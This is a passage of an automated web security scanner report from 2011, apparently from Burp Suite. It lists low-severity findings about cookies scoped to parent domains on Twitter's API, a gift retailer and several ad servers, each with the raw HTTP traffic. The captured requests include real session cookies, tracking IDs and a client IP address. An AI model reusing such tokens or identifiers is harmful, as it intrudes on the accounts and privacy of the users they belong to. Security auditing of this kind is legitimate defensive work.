The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110147983668019200&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315097070986=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315097213-36482-17537
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 00:46:53 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.03541
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9d4c870c9296f3cdf37ddb0b78039db1ef7aa6d3
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

11.2. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=TheStateWorker&callback=jQuery15205311797398608178_1315097321811&_=1315097336786 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTcy%250ANjg1MmRkYWE1MzRlMmE4OGU2OTFjYTBiYWVlOWQ1--e78b59f956406f6acf8bd93189b1699ee1b15969

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:02:55 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00676
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:07:55 GMT
Vary: Accept-Encoding
Content-Length: 267
Connection: close

jQuery15205311797398608178_1315097321811({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=TheStateWorker&c
...[SNIP]...

11.3. http://www.personalcreations.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

11.4. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2925993182975414771 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

11.5. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

11.6. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.7. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; 
rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
